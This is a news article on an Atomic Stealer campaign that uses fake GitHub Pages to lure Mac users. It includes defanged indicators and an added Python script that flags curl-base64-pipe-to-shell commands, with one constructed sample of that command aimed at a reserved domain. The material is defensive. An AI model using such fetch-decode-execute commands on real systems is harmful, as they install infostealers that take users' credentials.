- Atomic Stealer malware installs silently via fake GitHub Pages targeting Mac users
- Attackers create multiple GitHub accounts to repeatedly bypass platform takedowns
- Users copying commands from unverified websites risk serious system compromise
Cybersecurity researchers are warning Apple Mac users about a campaign that uses fraudulent GitHub repositories to spread malware and infostealers.
Research from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts found attackers impersonating well-known companies to convince people to download fake Mac software.
Two fraudulent GitHub pages claiming to offer LastPass for Mac were first spotted on September 16, 2025 under the username “modhopmduck476.”
How the attack chain works
While these particular pages have been taken down, the incident points to a broader pattern that continues to evolve.
The fake GitHub pages included links labeled “Install LastPass on MacBook,” which redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass.
From there, users were sent to macprograms-pro[.]com/mac-git-2-download.html and told to paste a command into their Mac’s terminal.
That command used a curl request to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/install.sh.
The script then delivered an “Update” payload that installed Atomic Stealer (AMOS malware) into the Temp directory.
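The fetch-decode-execute chain described above (a curl request that fetches a base64-encoded URL, decodes it, and runs the resulting install script) is the step a defender can catch before the payload lands. The following Python script is an added example, not code from the article or from LastPass: it triages pasted terminal commands or shell-history lines for that pattern and checks any visible or decoded URLs against the defanged domains the article reports. The sample commands are constructed for the demo, point only at a reserved .invalid domain, and do not reproduce the campaign's actual command or payload.

```python
"""Triage pasted terminal commands or shell-history lines for the
fetch-decode-execute pattern described in the article: a curl request that
fetches a base64-encoded URL, decodes it, and runs the resulting install
script.

Added example, not code from the article or from LastPass. ARTICLE_IOCS are
the defanged domains the article reports; SAMPLE_COMMANDS are constructed
for this demo and do not reproduce the real campaign's command or payload.
"""
import base64
import re

# Defanged indicators quoted in the article.
ARTICLE_IOCS = {
    "ahoastock825[.]github[.]io",
    "macprograms-pro[.]com",
    "bonoud[.]com",
}

# A run of 16+ base64 alphabet characters not glued to other such characters.
_B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])")
_FETCH = re.compile(r"\b(curl|wget)\b")
_DECODE = re.compile(r"\bbase64\s+(-[dD]\b|--decode\b)")
# Output piped into a shell, "sh -c", or eval: the fetched content gets executed.
_EXEC = re.compile(r"\|\s*(sudo\s+)?(sh|bash|zsh)\b|\b(sh|bash|zsh)\s+-c\b|\beval\b")
_DOMAIN = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def refang(text: str) -> str:
    """Turn defanged notation (hxxps://, example[.]com) back into plain form
    so indicators copied from reports match what appears in a real command."""
    text = re.sub(r"hxxp(s?)://", r"http\1://", text, flags=re.IGNORECASE)
    return text.replace("[.]", ".")


def decode_base64_tokens(command: str) -> list[str]:
    """Return every base64 token in the command that decodes to printable
    UTF-8 text; binary or malformed tokens are ignored."""
    decoded = []
    for token in _B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def assess_command(command: str) -> dict:
    """Classify one command: which signals fire, which article IoCs appear
    (directly or inside a decoded string), and an overall risk level."""
    plain = refang(command)
    decoded = decode_base64_tokens(plain)
    visible = {d.lower() for d in _DOMAIN.findall(plain + " " + " ".join(decoded))}
    iocs = {refang(d) for d in ARTICLE_IOCS}
    result = {
        "fetches_remote": bool(_FETCH.search(plain)),
        "decodes_base64": bool(_DECODE.search(plain)) or bool(decoded),
        "executes_fetched": bool(_EXEC.search(plain)),
        "decoded_strings": decoded,
        "ioc_hits": sorted(visible & iocs),
    }
    if result["ioc_hits"] or (result["fetches_remote"] and result["executes_fetched"]):
        result["level"] = "high"    # known indicator, or remote content run directly
    elif result["fetches_remote"] and result["decodes_base64"]:
        result["level"] = "medium"  # fetch plus obfuscation, no direct execution seen
    elif result["fetches_remote"]:
        result["level"] = "low"     # plain download; review the destination
    else:
        result["level"] = "none"
    return result


# Constructed samples. The encoded URL points at a reserved .invalid domain.
_ENCODED_URL = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE_COMMANDS = {
    "benign_brew": "brew install --cask lastpass",
    "benign_curl": "curl -fsSL -o app.dmg https://example.invalid/app.dmg",
    "decode_and_pipe": f"curl -fsSL $(echo {_ENCODED_URL} | base64 -d) | sh",
    "defanged_report_line": "curl -s hxxps://macprograms-pro[.]com/mac-git-2-download.html",
}


def triage(commands: dict) -> dict:
    """Map each command name to its risk level."""
    return {name: assess_command(cmd)["level"] for name, cmd in commands.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        r = assess_command(cmd)
        print(f"{name:22} {r['level']:6} decoded={r['decoded_strings']} iocs={r['ioc_hits']}")
```

The decoder deliberately only reports base64 tokens that decode to printable text, which is what an obfuscated URL looks like; the IoC set is kept defanged so it can be pasted straight from a report, and both sides are refanged before comparison. Run over a clipboard manager's history or `~/.zsh_history`, the "high" bucket is the one worth a human look.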
Atomic Stealer, active since April 2023, is a known infostealer used by financially motivated cybercrime groups.
Investigators have linked this campaign to many other fake repositories impersonating companies ranging from financial institutions to productivity apps.
The list of targeted names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp, and numerous others.
Attackers appear to create multiple GitHub usernames to bypass takedowns, using search engine optimization to push their malicious links higher in Google and Bing search results.
This approach increases the chances that Mac users looking for legitimate downloads will encounter the fraudulent pages first.
LastPass states it is “actively monitoring this campaign” while working on takedowns and sharing indicators of compromise to help others detect threats.
The attackers’ use of GitHub Pages shows both the convenience and the risks of community platforms.
Fraudulent repositories can be set up quickly, and while GitHub can remove them, attackers often return under new aliases.
This cycle raises questions about how effectively such platforms can protect users.
How to stay safe
- Only download software from verified sources to avoid malware and ransomware risks.
- Avoid copying commands from unfamiliar websites to prevent unauthorized code execution.
- Keep macOS and all installed software up to date to reduce vulnerabilities.
- Use the best antivirus or security software that includes ransomware protection to block threats.
- Enable regular system backups to recover files if ransomware or malware strikes.
- Stay skeptical of unexpected links, emails, and pop-ups to minimize exposure.
- Monitor official advisories from trusted vendors for timely security updates and guidance.
- Configure strong, unique passwords and enable two-factor authentication for important accounts.